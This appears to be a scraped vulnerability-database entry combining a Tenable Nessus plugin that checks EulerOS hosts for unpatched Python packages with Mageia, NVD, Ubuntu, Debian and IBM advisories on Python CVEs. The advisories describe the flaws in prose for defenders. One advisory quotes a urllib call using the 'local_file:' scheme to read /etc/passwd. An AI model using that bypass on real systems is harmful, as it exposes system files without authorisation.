Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : python (EulerOS-SA-2019-1434)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-4238", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365", "CVE-2016-0772", "CVE-2016-2183", "CVE-2016-5636", "CVE-2016-5699", "CVE-2017-1000158", "CVE-2018-1060", "CVE-2018-1061", "CVE-2018-14647", "CVE-2019-5010", "CVE-2019-9636", "CVE-2019-9948"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:python", "p-cpe:/a:huawei:euleros:python-devel", "p-cpe:/a:huawei:euleros:python-libs", "p-cpe:/a:huawei:euleros:python-tools", "p-cpe:/a:huawei:euleros:tkinter", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1434.NASL", "href": "https://www.tenable.com/plugins/nessus/124937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124937);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-1752\",\n \"CVE-2013-4238\",\n \"CVE-2014-4616\",\n \"CVE-2014-7185\",\n \"CVE-2014-9365\",\n \"CVE-2016-0772\",\n \"CVE-2016-2183\",\n \"CVE-2016-5636\",\n \"CVE-2016-5699\",\n \"CVE-2017-1000158\",\n \"CVE-2018-1060\",\n \"CVE-2018-1061\",\n \"CVE-2018-14647\",\n \"CVE-2019-5010\",\n \"CVE-2019-9636\",\n \"CVE-2019-9948\"\n );\n script_bugtraq_id(\n 61738,\n 63804,\n 68119,\n 70089,\n 71639\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : python (EulerOS-SA-2019-1434)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The 
remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that Python's smtplib library did not\n return an exception when StartTLS failed to be\n established in the SMTP.starttls() function. A man in\n the middle attacker could strip out the STARTTLS\n command without generating an exception on the Python\n SMTP client application, preventing the establishment\n of the TLS layer.(CVE-2016-0772)\n\n - A vulnerability was discovered in Python, in the\n built-in zipimporter. A specially crafted zip file\n placed in a module path such that it would be loaded by\n a later 'import' statement could cause a heap overflow,\n leading to arbitrary code execution.(CVE-2016-5636)\n\n - A flaw was found in the way the DES/3DES cipher was\n used as part of the TLS/SSL protocol. A\n man-in-the-middle attacker could use this flaw to\n recover some plaintext data by capturing large amounts\n of encrypted traffic between TLS/SSL server and client\n if the communication used a DES/3DES based\n ciphersuite.(CVE-2016-2183)\n\n - The Python standard library HTTP client modules (such\n as httplib or urllib) did not perform verification of\n TLS/SSL certificates when connecting to HTTPS servers.\n A man-in-the-middle attacker could use this flaw to\n hijack connections and eavesdrop or modify transferred\n data.(CVE-2014-9365)\n\n - An integer overflow flaw was found in the way the\n buffer() function handled its offset and size\n arguments. An attacker able to control those arguments\n could use this flaw to disclose portions of the\n application memory or cause it to crash.(CVE-2014-7185)\n\n - A flaw was found in the way catastrophic backtracking\n was implemented in python's pop3lib's apop() method. 
An\n attacker could use this flaw to cause denial of\n service.(CVE-2018-1060)\n\n - The ssl.match_hostname function in the SSL module in\n Python 2.6 through 3.4 does not properly handle a '\\\\0'\n character in a domain name in the Subject Alternative\n Name field of an X.509 certificate, which allows\n man-in-the-middle attackers to spoof arbitrary SSL\n servers via a crafted certificate issued by a\n legitimate Certification Authority, a related issue to\n CVE-2009-2408.(CVE-2013-4238)\n\n - It was found that the Python's httplib library (used by\n urllib, urllib2 and others) did not properly check\n HTTPConnection.putheader() function arguments. An\n attacker could use this flaw to inject additional\n headers in a Python application that allowed user\n provided header names or values.(CVE-2016-5699)\n\n - CPython (aka Python) up to 2.7.13 is vulnerable to an\n integer overflow in the PyString_DecodeEscape function\n in stringobject.c, resulting in heap-based buffer\n overflow (and possible arbitrary code\n execution)(CVE-2017-1000158)\n\n - A flaw was found in the way catastrophic backtracking\n was implemented in python's difflib.IS_LINE_JUNK\n method. An attacker could use this flaw to cause denial\n of service.(CVE-2018-1061)\n\n - It was discovered that multiple Python standard library\n modules implementing network protocols (such as httplib\n or smtplib) failed to restrict sizes of server\n responses. A malicious server could cause a client\n using one of the affected modules to consume an\n excessive amount of memory.(CVE-2013-1752)\n\n - A flaw was found in the way the json module handled\n negative index argument passed to certain functions\n (such as raw_decode()). 
An attacker able to control\n index value passed to one of the affected functions\n could possibly use this flaw to disclose portions of\n the application memory.(CVE-2014-4616)\n\n - urllib in Python 2.x through 2.7.16 supports the\n local_file: scheme, which makes it easier for remote\n attackers to bypass protection mechanisms that\n blacklist file: URIs, as demonstrated by triggering a\n urllib.urlopen('local_file:///etc/passwd')\n call.(CVE-2019-9948)\n\n - Python's elementtree C accelerator failed to initialise\n Expat's hash salt during initialization. This could\n make it easy to conduct denial of service attacks\n against Expat by contructing an XML document that would\n cause pathological hash collisions in Expat's internal\n data structures, consuming large amounts CPU and\n RAM.(CVE-2018-14647)\n\n - A null pointer dereference vulnerability was found in\n the certificate parsing code in Python. This causes a\n denial of service to applications when parsing\n specially crafted certificates. This vulnerability is\n unlikely to be triggered if application enables SSL/TLS\n certificate validation and accepts certificates only\n from trusted root certificate\n authorities.(CVE-2019-5010)\n\n - Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is\n affected by: Improper Handling of Unicode Encoding\n (with an incorrect netloc) during NFKC normalization.\n The impact is: Information disclosure (credentials,\n cookies, etc. that are cached against a given\n hostname). The components are: urllib.parse.urlsplit,\n urllib.parse.urlparse. The attack vector is: A\n specially crafted URL could be incorrectly parsed to\n locate cookies or authentication data and send that\n information to a different host than when parsed\n correctly.(CVE-2019-9636)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1434\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?776f9511\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"python-2.7.5-69.h19\",\n \"python-devel-2.7.5-69.h19\",\n \"python-libs-2.7.5-69.h19\",\n \"python-tools-2.7.5-69.h19\",\n \"tkinter-2.7.5-69.h19\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. 
The bug is caused by allowing the user to supply a negative value that is used as an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). This issue also affected the python-simplejson package, which has been patched to fix the bug. \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-07-08T22:38:10", "type": "mageia", "title": "Updated python-simplejson package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-07-08T22:38:10", "id": "MGASA-2014-0286", "href": "https://advisories.mageia.org/MGASA-2014-0286.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated python and python3 packages fix security vulnerabilities: Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. 
The bug is caused by allowing the user to supply a negative value that is used as an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-07-08T22:35:18", "type": "mageia", "title": "Updated python & python3 packages fix two vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-07-08T22:35:18", "id": "MGASA-2014-0285", "href": "https://advisories.mageia.org/MGASA-2014-0285.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:19:35", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary 
process memory via a negative index value in the idx argument to the raw_decode function.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "type": "cve", "title": "CVE-2014-4616", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:2.7.11", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:2.7.0", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:3.3.4", "cpe:/a:python:python:3.4.6", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:3.3.6", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:3.2.6", "cpe:/a:python:python:3.5.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:3.4.3", "cpe:/a:python:python:2.7.12", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:2.7.13", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.3.5", "cpe:/a:python:python:3.1.0", "cpe:/a:python:python:2.7.8", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.4.5", 
"cpe:/a:python:python:2.7.3", "cpe:/a:python:python:3.4.1", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:2.7.2", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:python:python:3.4.4", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:2.7.7", "cpe:/a:python:python:3.4.0", "cpe:/a:python:python:3.0.0", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.4.7", "cpe:/o:opensuse_project:opensuse:12.3", "cpe:/a:python:python:3.3.3", "cpe:/a:python:python:2.7.10", "cpe:/a:python:python:2.7.9", "cpe:/a:python:python:3.4.2", "cpe:/a:python:python:3.0.1"], "id": "CVE-2014-4616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse_project:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:python:python:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.2:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2021-11-22T21:51:34", "description": "Array index error in the scanstring function in the _json module in Python\n2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent\nattackers to read arbitrary process memory via a negative index value in\nthe idx argument to the raw_decode function.\n\n#### Bugs\n\n * <http://bugs.python.org/issue21529>\n * <https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1333396>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1112285>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": 
"2014-06-26T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4616", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-26T00:00:00", "id": "UB:CVE-2014-4616", "href": "https://ubuntu.com/security/CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2022-04-03T07:41:15", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary process memory via a negative index value in the idx argument to the raw_decode function.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "type": "debiancve", "title": "CVE-2014-4616", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2017-08-24T20:29:00", "id": "DEBIANCVE:CVE-2014-4616", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2021-12-30T21:42:51", "description": "## Summary\n\nSecurity Bulletin: A security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)\n\n## Vulnerability Details\n\n**Title**\n\nA security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)\n\n**Summary**\n\nA vulnerable version of Python is shipped as a component of the IBM Resilient virtual appliance. Information about this security vulnerability can be seen below.\n\n**Vulnerability Details**\n\nCVEID: [CVE-2014-4616](<https://www.cvedetails.com/cve/CVE-2014-4616/>)\n\nCVEID: [\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n](<htt</p>\n </div>\n\n \n \n \n \n <div class=>)\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSIP9Q\",\"label\":\"IBM Security SOAR\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-04-19T21:33:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2017-1000158"], "modified": "2021-04-19T21:33:34", "id": "6599DC93FFCF552D50A8FC9F31B71D111EC8AFA95F2B494C03ED7610CB908101", "href": "https://www.ibm.com/support/pages/node/1162768", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T21:41:41", "description": "## Summary\n\nPowerKVM is affected by several vulnerabilities in Python. These vulnerabilities are now fixed.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2013-1752_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752>)** \nDESCRIPTION:** Python SSL module is vulnerable to denial of service, caused by an unlimited readline() function call. A remote attacker could exploit this vulnerability to exhaust all available memory resources. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90056_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90056>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n**CVEID:** [_CVE-2014-7185_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185>)** \nDESCRIPTION:** Python could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in bufferobject.c. An attacker could exploit this vulnerability to execute arbitrary code on the system. 
